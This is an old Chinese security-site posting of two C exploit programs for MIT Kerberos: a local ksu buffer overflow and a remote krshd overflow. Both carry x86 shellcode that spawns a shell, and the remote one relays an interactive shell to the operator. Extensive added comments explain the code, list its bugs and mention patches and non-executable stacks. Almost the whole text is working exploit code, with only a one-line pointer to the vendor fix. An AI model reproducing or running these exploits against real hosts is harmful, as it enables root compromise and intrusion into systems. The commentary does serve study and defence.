Kerberos ksu/krshd漏洞利用程序

(2000-05-23 00:00 )(不详 )(京九网联 )
导读-- Kerberos ksu/krshd漏洞利用程序......
发布时间: 2000-5-22 11:19:00
漏 洞 描 述:

ksux本地漏洞测试程序:

/********
* ksux.c -- ksu exploit
* written January 26, 2000
* Jim Paris <jim@jtan.com>
*
* This program exploits a vulnerability in the ksu utility included
* with the MIT Kerberos distribution. Versions prior to 1.1.1 are
* vulnerable.
*
* This exploit is for Linux/x86 with Kerberos version 1.0. Exploits
* for other operating systems and versions of Kerberos should also work.
*
* Since krb5_parse_name will reject input with an @ or /, this shellcode
* execs sh instead of /bin/sh. As a result, a copy of sh must
* reside in the current directory for the exploit to work.
*
*/

#include $#@60;stdlib.h$#@62;
#include $#@60;stdio.h$#@62;

/* Returns this process's stack pointer: the inline asm copies %esp into %eax,
 * which is where the x86 cdecl return value lives. There is no return
 * statement, so the value comes back only by that accident of convention --
 * falling off the end of a non-void function and using the result is
 * undefined in ISO C, and the instruction itself is x86-32 only. */
int get_esp(void) { __asm__("movl %esp,%eax"); }

/* Payload bytes copied into b[] at CODE_OFFSET by main(). As the file header
 * explains, it runs "sh" rather than "/bin/sh" because ksu's principal-name
 * parsing rejects '@' and '/', which is why a copy of sh must sit in the
 * current directory. The sequence contains no 0x00 byte, which matters
 * because main() measures it with strlen(). */
char *shellcode="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x02\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xffsh";

#define LEN 0x300         /* size of the argument buffer b[] built in main() */
#define RET_OFFSET 0x240  /* position in b[] of the 4-byte address; a NUL follows it */
#define JMP_OFFSET 0x240  /* added to get_esp() to form that address */
#define CODE_OFFSET 0x100 /* position in b[] where shellcode is copied */

/*
 * Entry point: builds a LEN-byte argument and hands it to ksu as the value of
 * the -n option (the principal name), which the file header says versions of
 * ksu before 1.1.1 mishandle. ksu is normally installed setuid root, which is
 * what turns a local overflow in it into a privilege-escalation issue. The
 * argument layout is: 0x90 filler, shellcode at CODE_OFFSET, and at
 * RET_OFFSET a 4-byte address derived from this process's own stack pointer,
 * followed by a terminating NUL.
 *
 * Defects as written: memset/memcpy/strlen and execlp are used with no
 * <string.h>/<unistd.h> include (implicit declarations); argc, argv, i and j
 * are unused; main falls off the end without returning a value; storing a
 * stack address in int and writing an int through a char buffer are
 * 32-bit/x86 assumptions. If execlp() fails nothing is reported.
 *
 * Defensive notes: the remedy is the upstream ksu update named in the header
 * (MIT Kerberos 1.1.1); a non-executable stack or a stack-protector build
 * would presumably break this technique independently of that fix.
 */
int main(int argc, char *argv[])
{
int esp=get_esp(); /* this process's stack pointer, the base for the address stored below */
int i,j; char b[LEN]; /* b as a whole is not a C string; only the NUL at RET_OFFSET+4 ends it */

memset(b,0x90,LEN); /* 0x90 is the x86 one-byte nop */
memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode)); /* shellcode has no embedded NUL, so strlen covers all of it */
*(int *)&b[RET_OFFSET]=esp+JMP_OFFSET; /* possibly unaligned int store through a char array: UB in ISO C, tolerated on x86 */
b[RET_OFFSET+4]=0; /* NUL right after the address: string handling on the target stops here */

execlp("ksu","ksu","-n",b,NULL); /* ksu found via PATH; replaces this process on success, returns silently on failure */
}

kshux远程漏洞测试程序:

/********
* kshux.c -- krshd remote exploit
* written April 8, 2000
* Jim Paris <jim@jtan.com>
*
* This program exploits a vulnerability in the krshd daemon included
* with the MIT Kerberos distribution. All versions are apparently
* vulnerable.
*
* This exploit is for Linux/x86 with Kerberos version 1.0, but you'll
* probably need a fair bit of xing to get it to work.
*
* And yes, it's ugly. I need to accept an incoming connection from the
* remote server, handle the fact that the overflow goes through two
* functions and a toupper(), make sure that certain overwritten pointers
* on the remote host's stack are set to valid values so that a strlen
* call in krb425_conv_principal() doesn't cause a segfault before we
* return into the shellcode, adjust the offset depending on the remote
* hostname to properly align things, etc etc. As a result, you'll
* probably have a hard time getting this to work -- it took a lot of
* hacking and hardcoded numbers to get this to work against my test
* systems.
*
*/

#include $#@60;stdio.h$#@62;
#include $#@60;sys/types.h$#@62;
#include $#@60;netdb.h$#@62;
#include $#@60;time.h$#@62;
#include $#@60;netinet/in.h$#@62;

#define LEN 1200        /* size of b[] and the body length declared to the server */
#define OFFSET 0        /* base alignment adjustment; main() adds a hostname-dependent term */
#define ADDR 0xbfffd7a4 /* hard-coded target stack address; av[2] adds a delta to it */

/* Payload bytes placed into b[] by main(). Identical to the ksux.c payload
 * apart from the trailing string ("/bin/sh" instead of "sh") and the one
 * byte (\x07 rather than \x02) that tracks that string's length. Contains
 * no 0x00 byte, which matters because main() measures it with strlen(). */
char *sc="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Opens a listening TCP socket on port 16474, tells the peer on descriptor r
 * which port to call back on (the text "16474" plus its NUL, 6 bytes -- this
 * matches the rsh-style secondary-port exchange, so presumably the remote
 * krshd connects back here), and blocks until one connection arrives.
 *
 * Defects as written: l doubles as the SO_REUSEADDR value and as accept()'s
 * address-length argument, so accept() is told the address buffer is 1 byte
 * long; accept() is also handed &sa without a struct sockaddr * cast and an
 * int * where socklen_t * is expected. The accepted descriptor is discarded,
 * the listening socket s is never closed, ra is unused, and setsockopt()'s
 * result and the write() length are unchecked. socket/bind/listen/accept,
 * bzero, write and exit need <sys/socket.h>, <strings.h>, <unistd.h> and
 * <stdlib.h>, none of which this file includes. Because the socket is bound
 * to INADDR_ANY and the peer is never verified, any host can complete the
 * accept(). "$#@60;" on this page is a rendering artifact for "<".
 */
void get_incoming(int r) {
int s, l=1; struct sockaddr_in sa, ra;
bzero(&sa,sizeof(sa));
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=htonl(INADDR_ANY);
sa.sin_port=htons(16474); /* hard-coded callback port; the same number is sent as text below */
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
perror("socket"),exit(1);
setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&l,sizeof(l)); /* lets the port be reused on quick re-runs; result ignored */
if(bind(s,(struct sockaddr *)&sa,sizeof(sa))$#@60;0)
perror("bind"),exit(1);
if(listen(s,1))
perror("listen"),exit(1);
write(r,"16474",6); /* 6 bytes: the five digits and the terminating NUL */
if(accept(s,&sa,&l)$#@60;0) /* l is still 1 here, so the peer address is truncated; sa is overwritten */
perror("accept"),exit(1);
}

/*
 * Connects a TCP socket to host h (dotted quad or DNS name) on port 544, the
 * kshell port, and returns the connected descriptor. Exits on any failure.
 *
 * Defects as written: inet_addr() returns in_addr_t but is stored in an int
 * and compared with INADDR_NONE; bcopy() of sizeof(i) bytes from h_addr
 * assumes an IPv4 answer (h_length of 4); only the first address is tried
 * and there is no connect timeout; gethostbyname() reports errors through
 * h_errno, so perror() prints an unrelated message. socket/connect,
 * inet_addr, bcopy and exit need <sys/socket.h>, <arpa/inet.h>,
 * <strings.h> and <stdlib.h>, which are not included. "$#@60;" and
 * "$#@62;" on this page are rendering artifacts for "<" and ">" (e->h_addr).
 */
int con_outgoing(char *h) {
int s, i; struct sockaddr_in a; struct hostent *e;
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
perror("socket"),exit(1);
if((i=inet_addr(h))==INADDR_NONE) { /* not a numeric address: fall back to a name lookup */
if((e=gethostbyname(h))==NULL)
perror("gethostbyname"),exit(1); /* should be herror(); errno is not set by the resolver */
bcopy(e-$#@62;h_addr,&i,sizeof(i)); } /* first returned address only */
bzero(&a,sizeof(a));
a.sin_family=AF_INET;
a.sin_addr.s_addr=i; /* already in network byte order from inet_addr()/h_addr */
a.sin_port=htons(544);
if(connect(s,(struct sockaddr *)&a,sizeof(a))$#@60;0)
perror("connect"),exit(1);
return s;
}

/*
 * Interactive relay: copies bytes from stdin to socket s and from s to stdout
 * until either side returns EOF or an error, then exits. This is the
 * operator's channel to whatever is on the other end after main() has sent
 * its data.
 *
 * Defects as written: with a NULL timeout select() never returns 0, so the
 * "closed" branch on that test is dead; read() < 1 treats EOF and errors the
 * same; both write() calls ignore short writes and errors; select/read/write
 * and exit need <sys/select.h>, <unistd.h> and <stdlib.h>, which are not
 * included. "$#@60;" on this page is a rendering artifact for "<".
 */
void bus(int s) {
int i; fd_set r; char b[1024];
for(;;) {
FD_ZERO(&r); FD_SET(0,&r); FD_SET(s,&r); /* rebuilt every pass because select() modifies the set */
if((i=select(s+1,&r,NULL,NULL,NULL))==-1)
perror("select"),exit(1);
if(i==0) fprintf(stderr,"closed\n"),exit(0); /* unreachable without a timeout */
if(FD_ISSET(s,&r)) {
if((i=read(s,b,sizeof(b)))$#@60;1)
fprintf(stderr,"closed\n"),exit(0);
write(1,b,i); } /* socket -> stdout, length unchecked */
if(FD_ISSET(0,&r)) {
if((i=read(0,b,sizeof(b)))$#@60;1)
fprintf(stderr,"closed\n"),exit(0);
write(s,b,i); } } /* stdin -> socket, length unchecked */
}

/*
 * Entry point. Usage: hostname [addr] [offset] [lo] [hi]; the usage message
 * only names the first three. Connects to krshd on av[1]:544, opens the
 * callback listener, sends a 23-byte header that declares a body length of
 * LEN, then sends LEN bytes built from 0x90 filler, the payload and a run of
 * stack addresses, and finally drops into the stdin/socket relay bus().
 *
 * The file header says the target's overflow passes through two functions
 * and a toupper() before it takes effect; that is why the address is rejected
 * if any of its bytes is an uppercase letter, and why the default offset
 * depends on strlen(av[1]) % 4 (presumably the hostname precedes this data in
 * the target's buffer and shifts its alignment). The "AUTHV0.1" tag and the
 * header's mention of krb425_conv_principal() point at the Kerberos 4
 * compatibility path of krshd, but the server side is not shown in this file.
 *
 * Defects as written: void main is non-standard; j is unused; "%p" is given
 * an int (format/argument mismatch, undefined); isupper() on a possibly
 * negative char is undefined -- cast to unsigned char; av[4]/av[5] are never
 * range-checked, so out-of-range values index b[] outside its bounds in the
 * address-fill loop; both write() results are unchecked; sprintf, strlen,
 * bcopy, isupper, atoi and write need <string.h>, <strings.h>, <ctype.h>,
 * <stdlib.h> and <unistd.h>, none of which are included. "$#@60;" and
 * "$#@62;" on this page are rendering artifacts for "<" and ">".
 *
 * Defensive notes: the server must bound the declared length before reading
 * the body into a fixed buffer; the upstream krshd fix, and not exposing
 * kshell/544 at all, are the real remedies, and a non-executable stack would
 * presumably break this particular technique. On the wire this is a 544/tcp
 * session carrying a 1200-byte body plus a callback connection to 16474/tcp.
 */
void main(int ac, char *av[])
{
int s, i, j, a=ADDR, o=OFFSET; /* a: target stack address; o: alignment adjustment, normalised to 0..3 below */
int l, h; /* range, in 4-byte slots, over which a-4 is repeated; defaults -10..10 */
char b[LEN];

if(ac$#@60;2) {
fprintf(stderr,"%s hostname [addr] [offset]\n",*av);
exit(1);
}
a+=(ac$#@62;2)?atoi(av[2]):0; /* av[2] is a delta added to ADDR, not an absolute address */
o+=(ac$#@62;3)?atoi(av[3]):(4-(strlen(av[1])%4)); /* default compensates for the hostname length */
o%=4;
if(o$#@60;0) o+=4; /* C's % keeps the dividend's sign, so a negative av[3] needs this */
l=(ac$#@62;4)?atoi(av[4]):-10;
h=(ac$#@62;5)?atoi(av[5]):10;
fprintf(stderr,"addr=%p, offset=%d\n",a,o); /* %p with an int is undefined; use %#x or cast to void * */

if(isupper(((char *)&a)[0]) || /* per the header the bytes go through toupper() on the server, */
isupper(((char *)&a)[1]) || /* so a byte that toupper() would change cannot survive */
isupper(((char *)&a)[2]) ||
isupper(((char *)&a)[3]))
fprintf(stderr,"error: addr contains uppercase\n"),exit(0);

s=con_outgoing(av[1]); /* control connection to krshd */
get_incoming(s); /* announce the callback port and wait for the server to connect back */

sprintf(&b[0],"AUTHV0.1blahblah"); /* 8-byte protocol tag followed by 8 filler bytes */
*(int *)(b+16)=htonl(LEN); /* declared body length in network order: the server reads this many bytes */
b[20]=4; b[21]=7; b[22]=123; /* three fixed bytes; their meaning is not evident from this file */
write(s,b,23);

for(i=0;i$#@60;LEN-8-strlen(sc)-1;i++) b[i]=0x90; /* 0x90 = x86 nop filler; int i vs size_t bound is a signed/unsigned comparison */
bcopy(sc,b+i,strlen(sc)+1); /* payload plus its NUL, ending 8 bytes before the end of b */
for(i=LEN-8;i$#@60;LEN;i++) b[i]=0x00; /* last 8 bytes zeroed */

for(i=255+o+l*4;i$#@60;=255+o+h*4;i+=4) *(int *)(b+i)=(a-4); /* overwrites part of the filler with a-4 every 4 bytes; l/h never checked against b's bounds */
*(int *)(b+251+o)=a; /* the header says these values must stay valid pointers for a strlen() on the target */

write(s,b,LEN); /* result unchecked; a short write leaves the server waiting for the rest */

bus(s);
}

解 决 方 法:

参考Kerberos补救方法。